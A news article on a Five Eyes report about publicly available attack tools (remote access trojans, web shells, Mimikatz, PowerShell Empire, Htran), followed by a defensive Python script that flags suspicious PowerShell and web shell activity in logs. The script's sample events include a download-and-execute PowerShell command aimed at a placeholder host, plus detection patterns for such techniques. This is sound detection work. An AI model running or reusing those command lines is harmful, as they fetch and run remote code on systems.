Attackers ranging from nation-state backed espionage groups to cyber criminal operations are increasingly turning to openly available hacking tools to help conduct campaigns, the cyber security authorities of Australia, Canada, New Zealand, the UK and US have warned.
The research by the nations involved in the ‘Five Eyes’ intelligence sharing arrangement provides a snapshot of some of the threats posed by cyber actors worldwide by detailing some of the commonly available tools used in attacks.
They are all freely available – often on the open web – and include remote access trojans, web shells and obfuscation tools. Combinations of some or all of these have been used in attack campaigns by some of the most prolific attackers around.
“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web,” said the report.
“Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives,” the report adds.
The UK’s National Cyber Security Agency notes that the list of tools is far from exhaustive, but it’s designed to help network defenders protect against some of the most commonly used free hacking tools.
Remote Access Trojans
Perhaps the most potentially damaging of the dangers detailed in the report are remote access trojans – malware which is secretly installed onto an infected system providing a backdoor to observe all activity and enabling the attacker to carry out commands which lead to data being stolen.
The particular example given in the report is JBiFrost, a trojan typically employed by low-skilled cyber criminals but with the capability to be exploited by state actors. What makes JBiFrost so potent is that it is cross-platform, with the ability to operate on Windows, Linux, Mac OS X and Android.
Often delivered via a phishing email, it allows attackers to move across networks and install additional software. This particular RAT is publicly available and the cyber security agencies said they have observed it being used in targeted attacks against critical national infrastructure owners and their supply chain operators.
Web shells
Web shells are malicious scripts which attackers upload to targets after an initial compromise in order to gain remote administrative capabilities, providing those behind the attack with the potential to really get their hooks into the target system – as well as being used to pivot to other areas of the network.
One example of a freely available web shell is China Chopper, which has been widely used by attackers to remotely access compromised web servers. Once installed on a system, the China Chopper web shell server can be accessed by the attacker at any time – among other things it can copy, rename, delete and even change the time-stamp of files.
Mimikatz
Mimikatz is an open-source utility used to retrieve clear text credentials and hashes from memory and has been available since 2007. While it wasn’t designed as a hacking tool and has legitimate use-cases, it is also used as a means of gaining access to credentials and admin privileges.
It’s been used in a wide variety of campaigns by various groups – this includes the NotPetya and BadRabbit ransomware attacks – where it was employed to extract administrator credentials from Windows machines in order to help the attack spread.
PowerShell Empire
PowerShell Empire was designed as a legitimate penetration testing tool in 2015, but it didn’t take attackers long to realise they could use it to help conduct malicious activity. The tool allows attackers to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network.
It also comes with the added bonus of operating almost entirely in memory – making it difficult to trace – and because PowerShell is legitimate software, malicious activity often goes unnoticed by security software.
C2 obfuscation tools
Unless they are indifferent to being discovered, attackers will often look to hide their tracks when compromising a target, using specific tools in order to obfuscate their location and activity.
One which is used in many attacks is Htran, an obfuscation tool which has been freely available on the internet since 2009 and is often reuploaded to places like GitHub. By using this tool, attackers can evade intrusion detection systems and hide communications with their command and control infrastructure.
The report says a broad range of cyber actors have been observed using Htran in attacks against both government and industry targets.
The cyber security agencies warn that these are far from the only freely available hacking tools open to attackers. However, there are a number of steps that organisations can take to improve their chances of not falling victim to campaigns using these or similar tools.
Recommendations by the NCSC include using multi-factor authentication, segregating networks, setting up a security monitoring capability and keeping systems and software up to date.
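The "security monitoring capability" recommended above can be as modest as a few heuristics run over logs the organisation already collects. The script below is an added illustration, not code from the Five Eyes report or the NCSC: it flags the two behaviours the article describes for PowerShell Empire (in-memory, command-line driven PowerShell) and for web shells (an attacker repeatedly POSTing to a script the application never deployed). The log lines, the field layout, the indicator list and its weights, the allowlist of deployed scripts and the alert threshold are all constructed assumptions for the example; a real deployment would tune them to its own environment.

```python
"""Toy log-monitoring heuristics for two tool families from the report.

Added example; every log line, indicator and threshold here is constructed.
"""
import re
from typing import Dict, List, Tuple

# --- 1. PowerShell command lines (Empire-style in-memory tooling) ---------

# Constructed indicator weights: switches and cmdlets that are rare in
# routine administration but common in command-line driven PowerShell tooling.
PS_INDICATORS: Dict[str, int] = {
    r"-enc(odedcommand)?\b": 2,
    r"-w(indowstyle)?\s+hidden\b": 1,
    r"-nop(rofile)?\b": 1,
    r"-noni(nteractive)?\b": 1,
    r"\biex\b|invoke-expression": 2,
    r"downloadstring\(": 2,
    r"-ep\s+bypass|-executionpolicy\s+bypass": 1,
}

# Constructed process-creation events: (host, user, command line).
# The base64 payload and the 198.51.100.7 address are placeholders.
PROCESS_EVENTS = [
    ("ws01", "alice", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\scripts\backup.ps1'),
    ("ws02", "bob", r"powershell.exe -NoP -NonI -W Hidden -Enc QQBBAEEAQQA="),
    ("srv01", "svc", r'''powershell.exe -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')"'''),
]


def score_powershell(cmdline: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator patterns) for one command line."""
    if "powershell" not in cmdline.lower():
        return 0, []
    hits = [p for p in PS_INDICATORS if re.search(p, cmdline, re.IGNORECASE)]
    return sum(PS_INDICATORS[p] for p in hits), hits


def suspicious_powershell(events, threshold: int = 3) -> List[dict]:
    """Events whose indicator score reaches the (constructed) threshold."""
    findings = []
    for host, user, cmd in events:
        score, hits = score_powershell(cmd)
        if score >= threshold:
            findings.append({"host": host, "user": user, "score": score, "hits": hits})
    return findings


# --- 2. Web server access log (web shell use) -----------------------------

# Constructed allowlist: script endpoints the application is known to serve.
DEPLOYED_SCRIPTS = {"/index.php", "/login.php", "/api/upload.php"}
SCRIPT_EXT = re.compile(r"\.(php|aspx?|jsp|jspx)$", re.IGNORECASE)

# Combined-log-format style line: ip ident user [time] "METHOD path proto" status bytes "referer"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \d+ "(?P<referer>[^"]*)"'
)

# Constructed access log: two legitimate clients and one repeatedly POSTing
# to a script that was never part of the deployed application.
ACCESS_LOG = [
    '203.0.113.5 - - [10/Oct/2018:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-"',
    '203.0.113.5 - - [10/Oct/2018:10:01:09 +0000] "POST /login.php HTTP/1.1" 302 0 "http://www.example/index.php"',
    '198.51.100.23 - - [10/Oct/2018:10:07:41 +0000] "POST /images/cache.php HTTP/1.1" 200 88 "-"',
    '198.51.100.23 - - [10/Oct/2018:10:07:55 +0000] "POST /images/cache.php HTTP/1.1" 200 1402 "-"',
    '203.0.113.9 - - [10/Oct/2018:10:08:00 +0000] "GET /static/logo.png HTTP/1.1" 200 3002 "http://www.example/index.php"',
]


def parse_access_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_script_posts(lines, deployed=DEPLOYED_SCRIPTS) -> Dict[Tuple[str, str], int]:
    """Count POSTs to script files the application does not deploy, keyed by (client ip, path)."""
    counts: Dict[Tuple[str, str], int] = {}
    for line in lines:
        rec = parse_access_line(line)
        if not rec or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]  # drop any query string
        if not SCRIPT_EXT.search(path) or path in deployed:
            continue
        key = (rec["ip"], path)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for f in suspicious_powershell(PROCESS_EVENTS):
        print("PowerShell alert:", f)
    for (ip, path), n in suspicious_script_posts(ACCESS_LOG).items():
        print(f"Web shell candidate: {n} POST(s) from {ip} to undeployed script {path}")
```

Both checks are deliberately cheap so they can run over existing process-creation and web access logs without new tooling. The web check relies on knowing which script endpoints the application legitimately serves, which is also what makes a newly uploaded script stand out; the PowerShell check scores command-line features rather than matching a single string, so a benign scripted backup scores zero while a hidden-window, encoded or download-and-execute invocation crosses the threshold.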